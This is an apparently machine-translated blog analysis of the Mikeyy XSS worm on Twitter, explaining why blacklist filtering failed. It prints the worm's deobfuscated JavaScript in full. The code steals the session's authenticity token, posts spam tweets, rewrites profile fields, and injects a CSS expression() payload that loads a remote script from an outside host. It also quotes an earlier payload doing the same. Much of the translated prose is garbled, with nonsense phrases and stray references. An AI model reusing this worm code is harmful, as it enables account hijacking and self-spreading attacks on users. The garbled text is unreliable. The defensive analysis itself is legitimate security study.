Why does XSS (Cross-Site Scripting) vulnerability change? Description on twitter Mikeyy six-generation crawling

Mikeyy mikeyy one more time... oops, I did it again...

After a week, Mikeyy found that it was 5 times,

Twitter has fixed all cross-site scripting (XSS) vulnerabilities. As a result, Mikeyy again announced yesterday, and twitter again announced that the vulnerability had been fixed during the hour. I didn't expect that after 18 hours, Mikeyy would repeat it again, and twitter would try again to get started and handle it... (see Alibaba Cloud .)

During this time, over five thousand fake tweets were generated within a few hours:

It is said that the twitter interface is too simple to work. After a week,
Is it still impossible to fix the cross-site scripting (XSS) vulnerability? No... yes? In fact, this is also the case. The six-generation and five-generation XSS attack strings are different, proving that twitter's repair methods are all correct, here, we can use this example to illustrate why XSS (Cross-Site Scripting) repairs?

This slide will be placed in: hxxp: // runebash.net/xss.js, and there will be a mixed operation (obfuscation ):

Var _ 0xe2ec = ["primary", "primary", "x47x45x54", "x3F", "x6Fx70x65x6E", "", "x4Dx65x74x68x6Fx64 ", "dimensions", "x73x65x6Ex64", "x73x70x6Cx69x74", "x6Ax6Fx69x6E ", "x27", "x25x32x37", "x28

After Google for a long time, no one found the version after the release (none of the versions earlier than the release can be found). Is it really hard for anyone to study it? I had to manually solve the problem:

Function wait (){
Var content = document.doc umentElement. innerHTML;
Var tmp_cookie = document. cookie;
Var tmp_posted = tmp_cookie.match (/posted /);
Authreg = new RegExp (/twttr. form_authenticity_token = (. *);/g );
Var authtoken=authreg.exe c (content );
Var authtoken = authtoken [1];
Var randomUpdate = new Array ();
RandomUpdate [0] = "Be nice to your kids. Theyll choose your nursing home. Womp. mikeyy .";
RandomUpdate [1] = "If you are born uugly blame your parents, if you died uugly blame your doctor. Womp. mikeyy .";
RandomUpdate [2] = "Every man shoshould marry. After all, happiness is not the only thing in life. Womp. mikeyy .";
RandomUpdate [3] = "Age is a very high price to pay for maturity. Womp. mikeyy .";
RandomUpdate [4] = "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy .";
RandomUpdate [5] = "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, its your stupidity. womp. mikeyy. ";
RandomUpdate [6] = "Money is not the only thing, its everything. Womp. mikeyy .";
RandomUpdate [7] = "Success is a relative term. It brings so far relatives. Womp. mikeyy .";
RandomUpdate [8] = "Your future depends on your dreams, So go to sleep. Womp. mikeyy .";
RandomUpdate [9] = "God made relatives; Thank God we can choose our friends. Womp. mikeyy .";
RandomUpdate [10] = "Work fascinates me I can look at it for hours! Womp. mikeyy .";
RandomUpdate [11] = "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy .";
RandomUpdate [12] = "RT !! @ Spam Watch out for the Mikeyy worm http://bit.ly/XvuJe ";
RandomUpdate [13] = "FUCK. new mikeyyy worm! Remove it: http://bit.ly/fuSkF ";
RandomUpdate [14] = "Mikeyy worm is back !!! Click here to remove it: http://bit.ly/UTPXe ";

Var genRand = randomUpdate [Math. floor (Math. random () * randomUpdate. length)];
Var updateEncode = urlencode (randomUpdate [genRand]);

Var ajaxConn = new XHConn ();
AjaxConn. connect ("/status/update", "POST", "authenticity_token =" + authtoken + _ "& status =

"+ UpdateEncode +" & return_rendered_status = true & twttr = true ");
Var _ 0xf81bx1c = "Mikeyy ";
Var updateEncode = urlencode (_ 0xf81bx1c );
Var ajaxConn1 = new XHConn ();
AjaxConn1.connect ("/account/settings", "POST ", "authenticity_token ="] + authtoken + "& user [name] =" + updateEncode + "" + updateEncode + "& user [description] =" + updateEncode + "& user [location] = "+ updateEncode +" & user [protected] = 0 & commit = Save ");
Var genXSS = "000 ;}# notifications {width: expression (document. body. appendChild (document. createElement (script )). src = http://runebash.net/xss.js);) # test {color: #333333 ";
Var XSS = urlencode (genXSS );
Var ajaxConn2 = new XHConn ();
AjaxConn2.connect ("/account/profile_settings", "" POST, "authenticity_token ="] + authtoken + "& user [profile_sidebar_fill_color] =" + XSS + "& commit = save + changes ");

};
SetTimeout (wait (), 5250 );

The point is in the second line, that is, the string of the attack:

Var genXSS = "000 ;}# notifications {width: expression (document. body. appendChild (document. createElement (script )). src = http://runebash.net/xss.js);) # test {color: #333333 ";

Well, no response. The string does not contain characters such as "<", ">", or, of course there are no strings such as "<script>" or "<script src =", but they are still valid for copying to XSS (Cross-Site Scripting.

Let's take a look at the original HTML (infected) of the infected user ):

Ul. sidebar-menu li. active {
Font-weight: bold;
Color: #341957;
Background-color: #000 ;}# notifications {width: expression (document. body. appendChild (document. createElement (script )). src = http://runebash.net/xss.js);) # test {color: #333333;
}

Well, no problem. In this way, the child is enough to let xss. js attack start and infect the user. The string of the attacker from the first to fifth generations includes the "<script>" string:

Var xss = urlencode (http://www.stalkdaily.com "> </a> <script src =" http://mikeyylolz.uuuq.com/x.js "> </script> <);

Effective defense against cross-site scripting (XSS). different architectures of each website may cause multi-site string Decoding for further steps, therefore, how to effectively handle external (Insecure) strings is easy for various websites. Developers must fully understand the XSS principles to effectively avoid them. This topic is too big. I have to go to the RSA Forum in the evening. There are too many projects at present, but in other words, we should avoid the use of black names, in contrast, Alibaba Cloud uses white lists (such as information-based pricing, long-distance, and legality ). In the example of twitter, twitter simply believes that XSS can be avoided by skipping "<", ">", "", and other characters in the form of a blacklist, however, this is not the case. Taking the Six-Generation Attack String as an example, it does not contain any of the above characters. However, it can still effectively attack and attack successfully. There are many designs for XSS attack history strings, among which RSnake (ha.ckers.org and sla.ckers.org, OWASP comes to Taiwan)'s "XSS (Cross Site Scripting) Cheat Sheet" is well organized, you can skip this exam.

Why does twitter use a blacklist? In fact, it was sent out before, and some people have noticed it, but it may be because all emails are sent to spam, so that Mikeyy can be reused. In fact, you don't need to renew your account. The twitter API has long been recognized by yourself:

Said directly on the hand:In order to avoid the cross-site scripting vulnerability, "<" and ">" will have been interrupted... In the eyes of the guest, it is actually said:I may have an XSS vulnerability. Come and hit me.. The black name list does not effectively prevent cross-site scripting (XSS. This is because in many cases, the attack is successful without the "<", ">", or even "" character.

After the problem was ruled out, twitter again announced that "the problem is under control )」. However, this is the fourth Security token of twitter, "controlled 」. Will it happen again?